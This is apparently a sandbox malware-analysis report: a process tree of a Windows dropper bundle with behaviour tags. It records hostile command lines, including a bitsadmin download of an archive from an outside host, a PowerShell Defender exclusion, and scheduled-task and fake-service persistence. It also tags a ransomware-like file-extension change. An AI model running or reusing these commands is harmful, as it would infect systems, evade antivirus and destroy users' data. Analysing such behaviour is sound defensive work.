C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4540 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4820 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4952 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5316 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5540 /prefetch:22⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15bfd6504f7748c.exeWed15bfd6504f7748c.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 6602⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 6802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 6842⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 6922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 9162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 9682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 11882⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 12002⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed15bfd6504f7748c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15bfd6504f7748c.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed15bfd6504f7748c.exe" /f3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\is-GOHTV.tmp\Wed15fbd6ef41b4f.tmp"C:\Users\Admin\AppData\Local\Temp\is-GOHTV.tmp\Wed15fbd6ef41b4f.tmp" /SL5="$101E8,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15fbd6ef41b4f.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-V7H1V.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-V7H1V.tmp\Sayma.exe" /S /UID=burnerch22⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Common Files\ISTIUIJWLX\ultramediaburner.exe"C:\Program Files\Common Files\ISTIUIJWLX\ultramediaburner.exe" /VERYSILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0LE1J.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-0LE1J.tmp\ultramediaburner.tmp" /SL5="$1101CA,281924,62464,C:\Program Files\Common Files\ISTIUIJWLX\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\88-8ec77-de2-ce596-124c0b9df2c46\Lovewaecacy.exe"C:\Users\Admin\AppData\Local\Temp\88-8ec77-de2-ce596-124c0b9df2c46\Lovewaecacy.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\23-9e6d3-995-b67b6-1f5969cbdbac6\Penalikuqae.exe"C:\Users\Admin\AppData\Local\Temp\23-9e6d3-995-b67b6-1f5969cbdbac6\Penalikuqae.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eejxqiwv.glg\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\eejxqiwv.glg\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\eejxqiwv.glg\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 6566⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 6606⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 6566⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 6526⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 8726⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\eejxqiwv.glg\GcleanerEU.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q5daec1v.wnv\installer.exe /qn CAMPAIGN="654" & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\q5daec1v.wnv\installer.exeC:\Users\Admin\AppData\Local\Temp\q5daec1v.wnv\installer.exe /qn CAMPAIGN="654"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q5daec1v.wnv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q5daec1v.wnv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632951007 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dlouesr5.vgy\any.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\dlouesr5.vgy\any.exeC:\Users\Admin\AppData\Local\Temp\dlouesr5.vgy\any.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ihxn2qrp.vby\gcleaner.exe /mixfive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ihxn2qrp.vby\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ihxn2qrp.vby\gcleaner.exe /mixfive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 6486⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 8806⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 9446⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 11766⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 12326⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ihxn2qrp.vby\gcleaner.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ovndxxru.g5d\autosubplayer.exe /S & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ovndxxru.g5d\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\ovndxxru.g5d\autosubplayer.exe /S5⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z6⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"6⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK6⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK7⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc984.tmp\tempfile.ps1"6⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT6⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8272 -s 2441⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8C95061F0D59A9D5A1071657FC4A9E74 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BB72366DE8C78B14AFF8D974B56B613E2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4463E06DF8AA7BC305DBBBEC91288FE9 E Global\MSI00002⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\0dba74ff9e694b40a11ba3d33b6b26d3 /t 7480 /p 87921⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9620 -s 6243⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4405.exeC:\Users\Admin\AppData\Local\Temp\4405.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\4405.exeC:\Users\Admin\AppData\Local\Temp\4405.exe2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\4405.exe"C:\Users\Admin\AppData\Local\Temp\4405.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4405.exe"C:\Users\Admin\AppData\Local\Temp\4405.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build2.exe"C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build2.exe"C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build2.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Drops file in Windows directory
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build3.exe"C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build3.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build3.exe"C:\Users\Admin\AppData\Local\f023137c-4f99-4631-a7df-34f9795ad1af\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\6E24.exeC:\Users\Admin\AppData\Local\Temp\6E24.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\B129.exeC:\Users\Admin\AppData\Local\Temp\B129.exe1⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pbwtazzn.exe" C:\Windows\SysWOW64\ybcteaax\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ybcteaax\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ybcteaax binPath= "C:\Windows\SysWOW64\ybcteaax\pbwtazzn.exe /d\"C:\Users\Admin\AppData\Local\Temp\B129.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
